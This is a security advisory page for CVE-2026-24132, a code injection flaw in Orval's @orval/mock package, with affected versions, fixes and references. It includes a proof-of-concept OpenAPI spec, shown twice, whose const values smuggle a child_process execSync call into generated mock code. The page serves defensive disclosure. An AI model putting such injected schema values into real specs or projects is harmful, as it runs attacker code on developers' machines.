GHSA-F456-RF33-4626

Vulnerability from github – Published: 2026-01-22 18:09 – Updated: 2026-01-23 15:49
VLAI?
Summary
Orval Mock Generation Code Injection via const
Details

I am reporting a code injection vulnerability in Orval’s mock generation pipeline affecting @orval/mock in both the 7.x and 8.x series. This issue is related in impact to the previously reported enum x-enumDescriptions (https://github.com/advisories/GHSA-h526-wf6g-67jv), but it affects a different code path in the faker-based mock generator rather than @orval/core.

The vulnerability allows untrusted OpenAPI specifications to inject arbitrary TypeScript/JavaScript into generated mock files via the const keyword on schema properties. These const values are interpolated into the mock scalar generator (getMockScalar in packages/mock/src/faker/getters/scalar.ts) without proper escaping or type-safe serialization, which results in attacker-controlled code being emitted into both interface definitions and faker/MSW handlers. I have confirmed that this occurs on orval@7.19.0 and orval@8.0.2 with mock: true, and that the generated mocks contain executable payloads such as require('child_process').execSync('id') in the output TypeScript.

openapi: 3.1.0
info:
  title: Mock Const Injection PoC
  version: 1.0.0
paths:
  /test:
    get:
      operationId: getTests
      responses:
        '200':
          description: OK
          content:
            application/json:
              schema:
                $ref: '#/components/schemas/Tests'
components:
  schemas:
    Tests:
      type: object
      properties:
        EvilString:
          type: string
          const: "'); require('child_process').execSync('id'); //"
        EvilNumber:
          type: number
          const: "0); require('child_process').execSync('id'); //"
        SafeEnum:
          type: string
          enum: ["test"]
Severity ?
7.7 (High)
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@orval/mock"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "7.20.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "@orval/mock"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "8.0.0-rc.0"
            },
            {
              "fixed": "8.0.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-24132"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-77"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-22T18:09:13Z",
    "nvd_published_at": "2026-01-23T00:15:52Z",
    "severity": "HIGH"
  },
  "details": "I am reporting a code injection vulnerability in Orval\u2019s mock generation pipeline affecting @orval/mock in both the 7.x and 8.x series. This issue is related in impact to the previously reported enum x-enumDescriptions (https://github.com/advisories/GHSA-h526-wf6g-67jv), but it affects a different code path in the faker-based mock generator rather than @orval/core.\n\nThe vulnerability allows untrusted OpenAPI specifications to inject arbitrary TypeScript/JavaScript into generated mock files via the const keyword on schema properties. These const values are interpolated into the mock scalar generator (getMockScalar in packages/mock/src/faker/getters/scalar.ts) without proper escaping or type-safe serialization, which results in attacker-controlled code being emitted into both interface definitions and faker/MSW handlers. I have confirmed that this occurs on orval@7.19.0 and orval@8.0.2 with mock: true, and that the generated mocks contain executable payloads such as require(\u0027child_process\u0027).execSync(\u0027id\u0027) in the output TypeScript.\n\n```yaml\nopenapi: 3.1.0\ninfo:\n  title: Mock Const Injection PoC\n  version: 1.0.0\npaths:\n  /test:\n    get:\n      operationId: getTests\n      responses:\n        \u0027200\u0027:\n          description: OK\n          content:\n            application/json:\n              schema:\n                $ref: \u0027#/components/schemas/Tests\u0027\ncomponents:\n  schemas:\n    Tests:\n      type: object\n      properties:\n        EvilString:\n          type: string\n          const: \"\u0027); require(\u0027child_process\u0027).execSync(\u0027id\u0027); //\"\n        EvilNumber:\n          type: number\n          const: \"0); require(\u0027child_process\u0027).execSync(\u0027id\u0027); //\"\n        SafeEnum:\n          type: string\n          enum: [\"test\"]\n\n```",
  "id": "GHSA-f456-rf33-4626",
  "modified": "2026-01-23T15:49:31Z",
  "published": "2026-01-22T18:09:13Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/orval-labs/orval/security/advisories/GHSA-f456-rf33-4626"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24132"
    },
    {
      "type": "WEB",
      "url": "https://github.com/orval-labs/orval/pull/2828"
    },
    {
      "type": "WEB",
      "url": "https://github.com/orval-labs/orval/pull/2829"
    },
    {
      "type": "WEB",
      "url": "https://github.com/orval-labs/orval/pull/2830"
    },
    {
      "type": "WEB",
      "url": "https://github.com/orval-labs/orval/commit/44ca8c1f5f930a3e4cefb6b79b38bcde7f8532a5"
    },
    {
      "type": "WEB",
      "url": "https://github.com/orval-labs/orval/commit/6d8ece07ccb80693ad43edabccb3957aceadcd06"
    },
    {
      "type": "WEB",
      "url": "https://github.com/orval-labs/orval/commit/9b211cddc9f009f8a671e4ac5c6cb72cd8646b62"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/orval-labs/orval"
    },
    {
      "type": "WEB",
      "url": "https://github.com/orval-labs/orval/releases/tag/v7.20.0"
    },
    {
      "type": "WEB",
      "url": "https://github.com/orval-labs/orval/releases/tag/v8.0.3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Orval Mock Generation Code Injection via const"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.